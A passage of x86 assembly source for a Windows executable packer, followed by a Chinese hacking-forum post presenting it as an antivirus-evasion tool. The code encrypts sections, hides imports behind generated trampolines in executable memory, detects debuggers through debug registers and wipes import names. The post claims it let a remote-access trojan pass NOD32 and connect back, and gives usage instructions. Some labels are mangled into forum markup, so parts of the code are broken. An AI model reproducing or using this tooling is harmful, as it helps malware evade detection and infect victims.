; ranges are copied correctly. pushf/popf restore the caller's direction flag.
move_memory proc
; jecxz mm9
or ecx,ecx
jz mm9
cmp esi,edi
je mm9
check_int3_0
pushf
cld
cmp esi,edi
jae @f                      ; source at or above destination: forward copy
add esi,ecx
add edi,ecx
dec esi                     ; point both at the last byte
dec edi
std                         ; copy downwards
@@:
rep movsb
popf
mm9:
ret
move_memory endp
; proc_iat -- wrap a resolved API address in a freshly generated trampoline, so that the
; import slot written by the caller does not contain the API address itself.
; In:    eax = resolved API address, ebx = load delta
; Out:   eax = address of the trampoline; eax is returned unchanged when 4 or more of the
;        first 9 bytes at the target are zero (the target then does not look like code)
;        ecx, edx, esi, edi and ebp are restored (uses)
; Steps: 1. advance the pseudo-random state rnd and pick one of three templates
;           (api1: sub, api3: add, api2: xor)
;        2. derive the first immediate so that "first <op> rnd" equals the target
;        3. take space from the current 4096-byte block, or allocate a new one with
;           VirtualAlloc(MEM_COMMIT or MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE)
;        4. copy the template and patch both immediates
; The VirtualAlloc result is not checked before it is used.
; Analysis note: protected processes therefore hold private RWX pages filled with
; back-to-back copies of the api1/api2/api3 pattern, and their import slots point there.
proc_iat proc uses ecx edx esi edi ebp
mov esi,eax
mov ecx,9
mov edx,0
pi00:
cmp byte ptr [esi],0
jne @f
inc edx                     ; count zero bytes among the first 9
@@:
inc esi
loop pi00
cmp edx,4 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
check_int3_0                ; flags from the cmp survive the macro
jb pi0
;call disp1
jmp pi9
pi0:
mov esi,eax                 ; esi = target address
pi1:
; rnd = rol(rnd+1,5) + ror(rnd+1,17); repeat while the result is 0
inc rnd[ebx]
mov eax,rnd[ebx]
rol eax,5
mov edx,rnd[ebx]
ror edx,17
add eax,edx
mov rnd[ebx],eax
jz pi1
and eax,3                   ; 0 -> api1, 1 -> api3, 2 or 3 -> api2
cmp eax,0
jne @f
lea ebp,api1[ebx]
lea ecx,api1_1+1[ebx]
lea edx,api1_2+1[ebx]
mov edi,rnd[ebx]
add esi,edi                 ; the trampoline subtracts rnd again
push api1_len
jmp pi5
@@:
cmp eax,1
jne @F
lea ebp,api3[ebx]
lea ecx,api3_1+1[ebx]
lea edx,api3_2+1[ebx]
mov edi,rnd[ebx]
sub esi,edi                 ; the trampoline adds rnd again
push api3_len
jmp pi5
@@:
lea ebp,api2[ebx]
lea ecx,api2_1+1[ebx]
lea edx,api2_2+1[ebx]
mov edi,rnd[ebx]
xor esi,edi                 ; the trampoline xors with rnd again
push api2_len
pi5:
; allocate a new block unless the remaining space fits every template
cmp iat_size0[ebx],api1_len
jb pi6
cmp iat_size0[ebx],api2_len
jb pi6
cmp iat_size0[ebx],api3_len
jae pi8
pi6:
push ecx
push edx
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT or MEM_TOP_DOWN
push 4096
push 0
call f_VirtualAlloc[ebx]
mov iat_pt[ebx],eax
mov iat_size0[ebx],4096
pop edx
pop ecx
pi8:
pop eax                     ; template length pushed above
sub iat_size0[ebx],eax
push ecx
push edx
push esi
mov ecx,eax
mov eax,iat_pt[ebx]         ; eax = address of the new trampoline
add iat_pt[ebx],ecx
mov esi,0
pi81:
mov dl,ds:[ebp+esi]         ; byte-wise copy of the template
mov [eax+esi],dl
inc esi
loop pi81
pop esi
pop edx
pop ecx
sub ecx,ebp                 ; offsets of the two immediates inside the template
sub edx,ebp
mov dword ptr [eax+ecx],esi
mov dword ptr [eax+edx],edi
pi9:
ret
proc_iat endp
; decode_thread -- worker thread that decrypts the second stage of the stub in place.
; In:    para = load delta, kept in ebx
; Loop:  until bit 1 of flag_thread_end is set; works only while bit 1 of
;        flag_thread_active is set. One pass XORs every byte in
;        [decode_start, decode_end + debug-register sum) with the low byte of a rolling
;        key (key = ror(key+1,7) + debug-register sum per byte, starting at decode_key),
;        then clears bit 1 of flag_thread_active and sets bit 1 of flag_thread_finish.
; Exit:  removes the handler and sets bit 1 of flag_thread_exit.
; Each "int 0f7h" is serviced by seh1, which returns Dr0+Dr1+Dr2+Dr3 in eax and clears
; those registers; with no hardware breakpoints set the sum is 0 and the loop matches the
; builder's encryption loop.
; Analysis note: both the range end and the key stream move when hardware breakpoints are
; active in this thread, and decode_key is also altered by the checking threads, so a
; failed decryption is the expected symptom of a detected debugger.
decode_thread proc para
mov ebx,para
lea eax,seh1[ebx]
invoke set_seh,1,eax
dt0:
@@:
test flag_thread_end[ebx],10b
jnz dt9
test flag_thread_active[ebx],10b
jz @b
;.......
mov esi,decode_start[ebx]
mov eax,esi
int 0f7h                    ; eax = debug-register sum
mov edi,decode_end[ebx]
add edi,eax
mov eax,decode_key[ebx]
@@:
cmp esi,edi
jae @f
xor [esi],al
inc eax
ror eax,7
mov edx,eax
int 0f7h                    ; eax = debug-register sum
add eax,edx
inc esi
jmp @b
@@:
and flag_thread_active[ebx],0fffffffdh
or flag_thread_finish[ebx],10b
jmp dt0
dt9:
and flag_thread_active[ebx],0fffffffdh
invoke set_seh,0,0
or flag_thread_exit[ebx],10b
ret
decode_thread endp
; clear_string -- overwrite a NUL-terminated string with zero bytes, in place.
; In:    string = pointer to the string; values with bit 31 set are ignored
; Out:   nothing; eax and flags are preserved (uses eax, pushf/popf)
; The bit-31 test is applied on every step, so wiping also stops if the pointer reaches
; 80000000h. The import loop in this file calls it on DLL and function names right after
; they have been resolved.
; Analysis note: the name strings of the original import table are therefore absent from
; memory dumps taken after unpacking.
clear_string proc uses eax string
pushf
mov eax,string
cs1:
test eax,80000000h
jnz cs9
cmp byte ptr [eax],0
je cs9
mov byte ptr [eax],0
inc eax
jmp cs1
cs9:
check_int3
popf
ret
clear_string endp
firstrun:
lea eax,event_name[ebx]
push eax
push 0
push 0
push 0
call f_CreateEvent[ebx]
mov hEvent[ebx],eax
lea eax,pi[ebx] ;PROCESS_INFORMATION
push eax
lea eax,_si[ebx]
push eax
push 0
push 0
push 0
push 0
push 0
push 0
call f_GetCommandLine[ebx]
push eax
push 0
call f_CreateProcess[ebx]
cmp eax,0
je create_process_fail
push INFINITE
push dword ptr pi[0][ebx]
call f_WaitForSingleObject[ebx] ;等待进程结束
lea eax,proc_exit_code[ebx]
push eax
push dword ptr pi[0][ebx]
call f_GetExitCodeProcess[ebx]
push dword ptr pi[4][ebx]
call f_CloseHandle[ebx]
push dword ptr [pi+0][ebx]
call f_CloseHandle[ebx]
push dword ptr hEvent[ebx]
call f_CloseHandle[ebx]
jmp error_exit
mov eax,exitcode[ebx]
cmp proc_exit_code[ebx],eax ;;;312321
je _ok
jne error_exit
_ok:
cc:
call cc1 ;!!!
cc1: ;!!!
pop ebx
sub ebx,offset cc1
jmp @@1000
;;;call disp ;;;;;;;;;;;;;;;
@@1000:
;call disp1
mov edx,hModule[ebx]
mov esi,[edx+3ch]
lea esi,[esi+edx+0f8h]
mov edi,esi
@@:
imul esi,number_of_section[ebx],28h
add esi,edi
jmp @@10
cmp dword ptr [esi+0ch],0
je @@100
cmp dword ptr [esi+08h],0
je @@100
add esi,28h
jmp @b
@@100:
sub esi,28h
@@10:
sub esi,28h
cmp esi,edi
jb @@19
push edx
lea eax,old_protect_flag[ebx]
push eax
mov eax,hEvent[ebx]
push PAGE_READWRITE
add dword ptr [ebx][dc_edit+1],eax
mov eax,[esi+8]
test hEvent1[ebx],0ffffffffh
jz @@18
push eax
mov eax,[esi+0ch]
add eax,edx
push eax
call f_VirtualProtect[ebx]
pop edx
push old_protect_flag[ebx]
mov eax,dword ptr ttt[ebx]
int 0f7h
add dword ptr cc20[ebx],eax
jmp @@15
mov ecx,[edx+3ch]
lea ecx,[ecx+edx+0a8h]
mov eax,[ecx]
cmp eax,0
je @f
add eax,[ecx+4]
cmp eax,[esi+0ch]
jb @f
mov eax,[esi+0ch]
add eax,[esi+8]
cmp eax,[ecx]
ja @@18
@@:
mov ecx,[edx+3ch]
lea ecx,[ecx+edx+88h]
mov eax,[ecx]
cmp eax,0
je @f
add eax,[ecx+4]
cmp eax,[esi+0ch]
jb @f
mov eax,[esi+0ch]
add eax,[esi+8]
cmp eax,[ecx]
ja @@18
@@:
mov ecx,[edx+3ch]
lea ecx,[ecx+edx+0c0h]
mov eax,[ecx]
cmp eax,0
je @f
add eax,[ecx+4]
cmp eax,[esi+0ch]
jb @f
mov eax,[esi+0ch]
add eax,[esi+8]
cmp eax,[ecx]
ja @@18
@@:
@@15:
sub dword ptr cc2[ebx],eax
mov eax,[esi+8]
sub edx,check2[ebx]
cmp eax,[esi+10h]
jbe @f
mov eax,[esi+10h]
@@:
mov ecx,[esi+0ch]
;;;;;add ecx,edx
invoke decode,ecx,eax,edx,0
@@18:
jmp @@10
@@19:
;;;call disp1
;call disp1
;处理import表
iat:
mov edx,hModule[ebx]
mov esi,[edx+3ch]
mov esi,iat_offs[ebx] ;;;[esi+edx+80h] ;import table
cmp esi,0
je cc3
cc2:
mov eax,[esi+edx+0ch] ;dll name
cmp eax,0
je cc3
add eax,edx
push edx
push eax
push eax
call f_LoadLibrary[ebx]
call clear_string
pop edx
mov ecx,eax
mov edi,[esi+edx+10h] ;func name
add edi,edx
push esi
mov eax,[esi+edx+0]
cmp eax,0
jne @f
mov eax,[esi+edx+10h]
@@:
mov esi,eax
test hEvent1[ebx],0ffffffffh
jz cc20
add esi,edx
cc20:
cmp dword ptr [esi],0
je cc21
mov eax,dword ptr [esi]
test eax,80000000h
jnz @f
cmp eax,ecx
jae @f
add eax,edx
add eax,2
@@:
push eax
push eax
push ecx
call get_func_address
call clear_string
cmp eax,0
je @f
call proc_iat
mov [edi],eax
@@:
mov eax,hEvent[ebx]
add [edi],eax
add edi,4
test threadID[ebx],0ffffffffh
jz cc21
add esi,4
jmp cc20
cc21:
pop esi
add esi,14h
jmp cc2
cc3:
mov eax,hEvent[ebx]
mov edi,iat_offs[ebx]
add edi,edx
mov ecx,iat_size[ebx]
xor shell_eip[ebx],eax
mov al,0
; rep stosb ;清import table 有些程序不能正常运行
; call clear_import_table
;处理reloc表
;
mov edx,hModule[ebx]
mov esi,[edx+3ch]
mov esi,reloc_offs[ebx] ;;;[esi+edx+0a0h] ;reloc table
cmp esi,0
je rl2
lea esi,[esi+edx]
rl1:
cmp dword ptr [esi],0
je rl2
push esi
mov edi,[esi]
mov ecx,[esi+4]
sub ecx,8
shr ecx,1
rt12:
movzx eax,word ptr [esi+8]
push eax
and ax,0011000000000000b
cmp ax,0011000000000000b
pop eax
jne @f
and ax,0000111111111111b
add eax,edi
add dword ptr[eax+edx],edx
push ecx
mov ecx, dword ptr image_base[ebx]
sub dword ptr [eax+edx],ecx
mov ecx,check2[ebx]
add ecx,check1[ebx]
sub dword ptr [eax+edx],ecx
pop ecx
@@:
add esi,2
loop rt12
pop esi
add esi,[esi+4]
jmp rl1
rl2:
mov edi,reloc_offs[ebx]
add edi,edx
mov ecx,reloc_size[ebx]
mov al,0
; rep stosb
mov eax,decode_key[ebx]
mov edx,hModule[ebx]
mov esi,[edx+3ch]
lea esi,[esi+edx+0f8h]
mov edi,esi
xor shell_eip[ebx],eax
@@:
imul esi,number_of_section[ebx],28h
add esi,edi
jmp [email=_@@100]_@@100[/email]
cmp dword ptr [esi+0ch],0
je [email=_@@100]_@@100[/email]
cmp dword ptr [esi+08h],0
je [email=_@@100]_@@100[/email]
add esi,28h
jmp @b
[email=_@@100]_@@100[/email]:
sub esi,28h
xchg edi,esi
[email=_@@10]_@@10[/email]:
cmp esi,edi
jnbe [email=_@@19]_@@19[/email]
pop ecx
push edx
lea eax,old_protect_flag[ebx]
push eax
cc15:
push ecx
push dword ptr [esi+8]
mov eax,[esi+0ch]
add eax,edx
push eax
call f_VirtualProtect[ebx]
pop edx
add esi,28h
jmp [email=_@@10]_@@10[/email]
[email=_@@19]_@@19[/email]:
mov eax,shell_eip[ebx]
add eax,edx
add eax,check2[ebx]
xor eax,check1[ebx]
;call disp
push eax
;call disp1
or flag_thread_end[ebx],111b
or flag_thread_end[ebx],80000000h
@@:
mov eax,flag_thread_exit[ebx]
and eax,10000000000000000000000000000111b
xor eax,10000000000000000000000000000111b
jnz @b
pop eax
mov dword ptr proc_entry[ebx+1],eax
invoke set_seh,0,0
;call disp
or flag_finish[ebx],1
pe0:
cmp file_type[ebx],2 ;dll
jne @f
jmp pe1
@@:
;call disp1
lea edi,entry[ebx]
mov ecx,offset pe1 - offset entry
cld
mov al,0
rep stosb ;!!!
pe1: ;!!!
popad
popfd
;int 3
proc_entry label byte ;!!!
push 12345678 ;!!!
ret
second_entry:
call _cc1 ;!!!
_cc1: ;!!!
pop ebx
sub ebx,offset _cc1
push MB_YESNO
lea eax, titl[ebx]
push eax
lea eax, msg[ebx]
push eax
push 0
call f_MessageBox[ebx]
cmp eax,IDYES
je @f
push 0
jmp se1
@@:
push exitcode[ebx] ;;;312321
se1:
call f_ExitProcess[ebx]
__ok:
check2_end label byte
db 4 dup (?)
create_process_fail:
error_exit:
push 0
call f_ExitProcess[ebx]
;!!!
;added on 2006-3-4
db 'rNiLaToV'
ipt db 14h * 2 dup (0)
size1 = $ - offset ipt
dllname db 'kernel32.dll',0
size2 = $ - offset dllname
funname db 0,0,'GetVersion',0
size3 = $ - offset funname
funaddr dd ?,0
size4 = $ - offset funaddr
;added on 2006-3-4
key_size = $ - offset entry
db 1000h dup (0)
; trans -- split the builder's command line into up to three file names.
; In:    eax = pointer to the NUL-terminated command line
; Out:   fname1, fname2, fname3 = the 2nd, 3rd and 4th whitespace-separated tokens, each
;        NUL-terminated; buffers of tokens that are missing are left unwritten
;        eax, esi and edi are restored (uses)
; Separators are space (20h) and tab (09h). The first token (the program name) is skipped
; by searching for the first separator, so a quoted program path that contains a space is
; split in the wrong place, and quoted arguments are not supported either.
; NOTE(review): tokens are copied with no length limit, while fname1..fname3 are declared
; as 264-byte buffers -- a longer argument writes past the buffer.
trans proc uses eax esi edi
mov esi,eax
dec esi
@@:
; skip the first token: advance to the first space or tab
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @f
cmp al,9
jne @b
@@:
; skip the separators in front of token 2
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @b
cmp al,9
je @b
mov edi,offset fname1
@@:
; copy token 2 into fname1 (the terminating NUL is copied too when the line ends here)
mov al,[esi]
cmp al,20h
je @f
cmp al,9
je @f
mov [edi],al
inc esi
inc edi
cmp al,0
je t9
jmp @b
@@:
mov byte ptr [edi],0
dec esi
@@:
; skip the separators in front of token 3
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @b
cmp al,9
je @b
mov edi,offset fname2
@@:
; copy token 3 into fname2
mov al,[esi]
cmp al,20h
je @f
cmp al,9
je @f
mov [edi],al
inc esi
inc edi
cmp al,0
je t9
jmp @b
@@:
mov byte ptr [edi],0
dec esi
@@:
; skip the separators in front of token 4
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @b
cmp al,9
je @b
mov edi,offset fname3
@@:
; copy token 4 into fname3
mov al,[esi]
cmp al,20h
je @f
cmp al,9
je @f
mov [edi],al
inc esi
inc edi
cmp al,0
je t9
jmp @b
@@:
mov byte ptr [edi],0
t9:
ret
trans endp
; calc_checksum -- build-time computation of the two reference checksums that the stub's
; check_thread compares against at run time.
; In:    nothing (ebx is cleared, so labels are used at their link-time addresses)
; Out:   check1_sum = negated sum of the bytes in [check1_start, check1_end)
;        check2_sum = sum of the bytes in [check2_start, check2_end)
;        eax, ebx, ecx, edi and esi are restored (uses)
; The sums cover the code as it is in memory at the moment of the call, so any later
; change to either region has to be mirrored in what check_thread will see.
; Analysis note: the sums are plain additive checksums, not cryptographic hashes.
calc_checksum proc uses eax ebx ecx edi esi
mov ebx,0
lea esi,check1_start[ebx]
lea edi,check1_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
sub eax,ecx                 ; eax = -(sum of bytes)
inc esi
cmp esi,edi
jb @b
mov dword ptr check1_sum,eax
lea esi,check2_start[ebx]
lea edi,check2_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
add eax,ecx                 ; eax = sum of bytes
inc esi
cmp esi,edi
jb @b
mov dword ptr check2_sum,eax
ret
calc_checksum endp
start:
; int 3
jmp st1
invoke LoadLibrary,addr shell32
invoke GetProcAddress,eax,800000e9h
; invoke VirtualAlloc,0h,10000h,MEM_RESERVE,PAGE_READWRITE
; invoke VirtualQuery,eax,addr mbi,sizeof MEMORY_BASIC_INFORMATION
; invoke VirtualAlloc,0h,10000h,MEM_COMMIT,PAGE_READWRITE
; invoke VirtualAlloc,0h,10000h,MEM_COMMIT,PAGE_READWRITE
; invoke VirtualProtect,3e0000h,10,PAGE_READONLY,addr temp1
mov esi,400000h
@@:
invoke VirtualQuery,esi,addr mbi,sizeof MEMORY_BASIC_INFORMATION
; cmp dword ptr mbi[10h],10000h
; je @f
mov esi,dword ptr mbi[0] ;MEMORY_BASIC_INFORMATION.BaseAddress]
add esi,dword ptr mbi[0ch] ;MEMORY_BASIC_INFORMATION.RegionSize]
cmp eax,0
jne @b
@@:
mov eax,dword ptr mbi[0]
; invoke VirtualAlloc,eax,10h,MEM_COMMIT,PAGE_READWRITE
cmp eax,0
jne @f
invoke VirtualQuery,3e0000h,addr mbi,sizeof MEMORY_BASIC_INFORMATION
; invoke VirtualAlloc,0,10h,MEM_COMMIT,PAGE_READWRITE
invoke VirtualQuery,3e0000h,addr mbi,sizeof MEMORY_BASIC_INFORMATION
@@:
st1:
invoke VirtualProtect,addr entry,key_size,PAGE_READWRITE,addr temp1
invoke GetTickCount
push eax
invoke GetTickCount
pop edx
mul edx
mov dword ptr dc_edit+1,eax
mov dword ptr ec_edit+1,eax
call calc_checksum
invoke GetTickCount
push eax
invoke GetTickCount
pop edx
mul edx
mov decode_key,eax
not eax
mov rnd,eax
mov esi,offset _ok
mov edi,offset __ok
mov eax,decode_key
@@:
cmp esi,edi
jae @f
xor [esi],al
inc eax
ror eax,7
inc esi
jmp @b
@@:
invoke GetCommandLine
call trans ;分解命令行
invoke CreateFile,addr fname1,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0
cmp eax,INVALID_HANDLE_VALUE
je error1
mov hfile1,eax
invoke CreateFile,addr fname2,GENERIC_WRITE,0,0,CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,0
cmp eax,INVALID_HANDLE_VALUE
je error3
mov hfile3,eax
invoke GetFileSize,hfile1,0
mov fsize1,eax
invoke VirtualAlloc,0,fsize1,MEM_COMMIT,PAGE_READWRITE
mov pt1,eax
invoke ReadFile,hfile1,pt1,fsize1,addr temp1,0
mov ebx,pt1
mov esi,[ebx+3ch]
cmp flag_clear_boundimport,0
je @f
lea eax,[ebx+esi+0d0h]
mov dword ptr [eax],0
mov dword ptr [eax+4],0
@@:
cmp flag_clear_load_config,0
je @f
lea eax,[ebx+esi+0c8h]
mov dword ptr [eax],0
mov dword ptr [eax+4],0
@@:
mov eax,[ebx+esi+34h]
mov image_base,eax
push esi
lea esi,[ebx+esi+78h]
mov edi,offset rva_table
mov ecx,80h
call move_memory
pop esi
cmp flag_add_section,0
je @f
add word ptr [ebx+esi+6],1
@@:
mov eax,0
xchg eax,[ebx+esi+80h]
mov iat_offs,eax
mov eax,0
xchg eax,[ebx+esi+84h]
mov iat_size,eax
mov eax,0
xchg eax,[ebx+esi+0a0h]
mov reloc_offs,eax
mov eax,0
xchg eax,[ebx+esi+0a4h]
mov reloc_size,eax
lea edi,[esi+0f8h]
movzx eax,word ptr [ebx+esi+6]
mov temp1,eax
st2:
dec temp1
jz st3
jmp @f
cmp dword ptr [ebx+edi+0ch],0 ;;;;;;
je st3
cmp dword ptr [ebx+edi+08h],0 ;;;;;;
je st3
@@:
jmp st24
mov eax,dword ptr [ebx+esi+0a8h]
cmp eax,0
je @f
add eax,dword ptr [ebx+esi+0ach]
cmp eax,dword ptr [ebx+edi+0ch]
jb @f
mov eax,dword ptr [ebx+edi+0ch]
add eax,dword ptr [ebx+edi+8]
cmp eax,dword ptr [ebx+esi+0a8h]
ja st25
@@:
mov eax,dword ptr [ebx+esi+88h]
cmp eax,0
je @f
add eax,dword ptr [ebx+esi+8ch]
cmp eax,dword ptr [ebx+edi+0ch]
jb @f
mov eax,dword ptr [ebx+edi+0ch]
add eax,dword ptr [ebx+edi+8]
cmp eax,dword ptr [ebx+esi+88h]
ja st25
@@:
mov eax,dword ptr [ebx+esi+0c0h]
cmp eax,0
je @f
add eax,dword ptr [ebx+esi+0c4h]
cmp eax,dword ptr [ebx+edi+0ch]
jb @f
mov eax,dword ptr [ebx+edi+0ch]
add eax,dword ptr [ebx+edi+8]
cmp eax,dword ptr [ebx+esi+0c0h]
ja st25
@@:
st24:
mov eax,[ebx+edi+8]
cmp eax,[ebx+edi+10h]
jbe @f
mov eax,[ebx+edi+10h]
@@:
mov ecx,[ebx+edi+14h]
;;;;;;add ecx,ebx
mov edx,[ebx+edi+0ch]
sub ecx,edx ;
invoke encode,edx,eax,ebx,ecx
st25:
add edi,28h
jmp st2
st3:
push edi
lea eax,[esi+0f8h]
sub edi,eax
mov edx,0
mov eax,edi
mov edi,28h
div edi
mov number_of_section,eax
pop edi
cmp flag_add_section,0
jne st6
mov eax,fsize1
sub eax,[ebx+edi+14h]
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
push eax
add eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+08h],eax
mov [ebx+edi+10h],eax
or dword ptr [ebx+edi+24h],0a0000020h ;mov dword ptr [ebx+edi+24h],0e0000040h
pop ecx
mov eax,[ebx+edi+0ch]
add eax,ecx
add eax,offset entry
sub eax,offset entry
xchg [ebx+esi+28h],eax
mov shell_eip,eax
jmp st7
st6:
mov eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+8],eax
sub edi,28h
mov eax,[ebx+edi+0ch]
add eax,[ebx+edi+8]
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
add edi,28h
mov [ebx+edi+0ch],eax
mov eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+10h],eax
mov eax,fsize1
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+14h],eax
mov dword ptr [ebx+edi+24h],0e0000020h
mov eax,[ebx+edi+0ch]
add eax,offset entry
sub eax,offset entry
xchg [ebx+esi+28h],eax
mov shell_eip,eax
st7:
mov eax,[ebx+edi+0ch]
add eax,[ebx+edi+8]
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+esi+50h],eax
mov eax,decode_key
xor shell_eip,eax
lea esi,entry00
mov ecx,__ok - entry00
@@:
not byte ptr [esi]
inc esi
loop @b
mov flag_reentry,0
invoke WriteFile,hfile3,pt1,fsize1,addr temp1,0
cmp flag_add_section,0
jne st75
mov eax,fsize1
sub eax,[ebx+edi+14h]
mov ecx,1000h
sub ecx,eax
jns st71
@@:
add ecx,1000h
js @b
st71:
mov eax,ecx
jmp st8
st75:
mov eax,fsize1
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
sub eax,fsize1
st8:
lea ecx,_fill
invoke WriteFile,hfile3,ecx,eax,addr temp1,0
mov eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
invoke WriteFile,hfile3,addr entry,eax,addr temp1,0
invoke CloseHandle,hfile1
invoke CloseHandle,hfile3
invoke VirtualFree,pt1,0,MEM_RELEASE
invoke CreateFile,addr fname2,GENERIC_READ + GENERIC_WRITE,0,0,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0
cmp eax,INVALID_HANDLE_VALUE
je error3
mov hfile1,eax
invoke GetFileSize,hfile1,0
mov fsize1,eax
invoke VirtualAlloc,0,fsize1,MEM_COMMIT,PAGE_READWRITE
mov pt1,eax
invoke ReadFile,hfile1,pt1,fsize1,addr temp1,0
mov ecx,fsize1
mov edi,pt1
uu1:
cmp ecx,8
jb nofound
cmp dword ptr [edi],'LiNr' ;'rNiL'
jne uu2
cmp dword ptr [edi+4],'VoTa' ;'aToV'
je found
uu2:
inc edi
loop uu1
jmp nofound
found:
add edi,8
sub edi,pt1
mov ebx,pt1
mov esi,[ebx+3ch]
movzx ecx,word ptr [ebx+esi+6]
mov eax,[ebx+esi+74h]
shl eax,3
lea edx,[ebx+esi+78h]
add edx,eax
uu3:
cmp dword ptr [edx+14h],edi
ja s_nt
mov eax,[edx+8]
add eax,[edx+14h]
cmp eax,edi
jbe s_nt
mov eax,edi
sub eax,[edx+14h]
add eax,[edx+0ch]
mov [ebx+esi+80h],eax
mov dword ptr [ebx+esi+84h],14h ;size1+size2+size3+size4
lea ecx,[eax+size1]
mov [ebx+edi+0ch],ecx
lea ecx,[eax+size1+size2]
mov [ebx+edi+size1+size2+size3],ecx
lea ecx,[eax+size1+size2+size3]
mov [ebx+edi+10h],ecx
jmp found1
s_nt:
add edx,28h
loop uu3
jmp nofound
found1:
invoke SetFilePointer,hfile1,0,0,FILE_BEGIN
invoke WriteFile,hfile1,pt1,fsize1,addr temp1,0
nofound:
invoke CloseHandle,hfile1
invoke VirtualFree,pt1,0,MEM_RELEASE
error1:
error2:
error3:
exit0:
invoke ExitProcess,0
_fill db 1000h dup (0)
end start
-----------------------------------
程序很简单吧,你那么聪明,肯定看懂了,这只是一个小小的免杀工具模型,可以使用呵,我试验成功,不去特征的黑防鸽子免杀后,直接过NOD32,上线成功,怎么样。
注意,编译后,程序使用方法:shell.exe <input.exe> <output.exe>
如:shell.exe server.exe miansha.exe
明白??不明白的就是White口乞!!
-----------------------------------
PS:想交个朋友的回帖时打上QQ或邮箱,愿交天下志同道合的黑友。
不知道为什么我不能上传ZIP,RAR附件??郁闷,版主或管理员照顾一下我,让我能传附件好不好??